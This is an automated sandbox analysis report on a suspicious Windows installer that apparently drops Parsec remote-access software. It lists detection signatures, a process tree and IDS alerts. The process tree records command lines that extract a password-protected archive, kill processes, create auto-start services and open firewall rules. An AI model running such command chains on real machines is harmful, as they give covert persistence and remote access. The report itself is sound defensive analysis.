
Windows Analysis Report
uu8v4UUzTU.exe

Overview

General Information

Sample name: uu8v4UUzTU.exe
renamed because original name is a hash value
Original sample name: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Analysis ID: 1555525
MD5: 2d2f050e6c898065032cb2686a0effca
SHA1: 0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
SHA256: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
Tags: exe user-suspicious_link

Detection

Score: 42
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates files in the system32 config directory
Modifies the windows firewall
Sample is not signed and drops a device driver
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to open files direct via NTFS file id
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • uu8v4UUzTU.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 2D2F050E6C898065032CB2686A0EFFCA)
    • uu8v4UUzTU.tmp (PID: 5600 cmdline: "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 828B7D7624C14BE1F3D8122F6E2FAC53)
      • cmd.exe (PID: 3788 cmdline: "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 7z.exe (PID: 5364 cmdline: "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • cmd.exe (PID: 6644 cmdline: "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6516 cmdline: "CMD" /C del "SoundNight.7z" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1708 cmdline: "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • parsec-windows.exe (PID: 3868 cmdline: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe MD5: 01EF58E7C144C701B2EA01CFC049DBE4)
          • wscript.exe (PID: 6020 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 5588 cmdline: "C:\Windows\System32\sc.exe" control Parsec 200 MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 2940 cmdline: "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 3788 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 5356 cmdline: "C:\Windows\System32\sc.exe" stop Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 5704 cmdline: "C:\Windows\System32\sc.exe" delete Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5228 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 3652 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 5780 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 5972 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 6764 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • schtasks.exe (PID: 6544 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 6548 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 6412 cmdline: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 6532 cmdline: "C:\Windows\System32\sc.exe" start Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5944 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 744 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5628 cmdline: cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vud.exe (PID: 2000 cmdline: "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: 2D009D446A0BA83EC2F12242F7ED126C)
              • cmd.exe (PID: 4476 cmdline: cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconc.exe (PID: 5908 cmdline: "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: DDDEE00430F7A3D52580B7C85D63D9DC)
              • cmd.exe (PID: 616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 5024 cmdline: nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 1876 cmdline: nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 384 cmdline: nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                  • runonce.exe (PID: 4984 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
                    • grpconv.exe (PID: 4280 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
          • cmd.exe (PID: 5800 cmdline: cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vdd.exe (PID: 5656 cmdline: "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: 4B9A3048286692A865187013B70F44E8)
              • wevtutil.exe (PID: 5352 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
                • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • wevtutil.exe (PID: 4820 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64 MD5: 1AAE26BD68B911D0420626A27070EB8D)
              • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 5608 cmdline: .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2172 cmdline: .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 180 cmdline: .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
  • pservice.exe (PID: 3576 cmdline: "C:\Program Files\Parsec\pservice.exe" MD5: 46CD3FC327AF9109BD143BA7F16DF397)
  • svchost.exe (PID: 2804 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5548 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6180 cmdline: DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 1568 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 4696 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 5748 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wscript.exe, SourceProcessId: 3788, StartAddress: FAFEB0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 3788
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe, ProcessId: 384, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentImage: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentProcessId: 3868, ParentProcessName: parsec-windows.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", ProcessId: 6020, ProcessName: wscript.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6548, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, ProcessId: 6412, ProcessName: sc.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, ProcessId: 2804, ProcessName: svchost.exe
Suricata IDS alerts for network traffic

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T02:58:22.700068+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49709 | TCP
2024-11-14T02:59:01.302200+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.5 | 49912 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T02:58:18.030414+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 34.160.111.145 | 443 | TCP
2024-11-14T02:58:19.166828+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-11-14T02:59:04.548903+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49940 | 104.18.0.181 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T02:58:19.902542+0100 | 2051091 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP


Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD031000 #224,CryptBinaryToStringW,CertFreeCertificateContext,39_2_00007FF7CD031000
Source: uu8v4UUzTU.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\firewall-add.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-install.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vusb
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vdd
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\teams.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel\appdata.json
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Directory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: unknown | HTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: uu8v4UUzTU.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
